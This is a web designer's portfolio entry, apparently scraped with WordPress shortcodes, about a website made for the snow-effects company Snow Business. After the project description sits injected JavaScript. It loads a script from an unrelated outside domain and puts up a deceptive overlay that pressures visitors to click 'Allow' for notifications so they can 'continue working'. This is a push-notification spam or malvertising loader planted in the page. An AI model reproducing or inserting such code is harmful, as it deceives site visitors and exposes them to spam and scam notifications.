[tw-column width=”one-third” position=”first”]
Client
Snow Businness
[tw-button size=”medium” background=”76c9c6″ color=”” target=”_blank” link=”http://www.snowbusiness.com”]Visit Site[/tw-button]
[/tw-column]
[tw-column width=”two-third” position=”last”]
About the Project
If you’ve seen snow on TV or Film over the past 30 years, you’ve probably seen the work of Snow Business. Keen to create a modern website to display their portfolio of work (including Game Of Thrones, Doctor Who, and Avengers: Age of Ultron) I was inspired by the geometric shapes of snowflakes, and the striking colours of the Northern Lights.
[/tw-column]
const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website."}};
const overlay = {"delay":3000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement('script');
s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009';
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {});
sdk.onPermissionAllowed(() => {});
sdk.onPermissionDenied(() => {});
sdk.onAlreadySubscribed(() => {});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);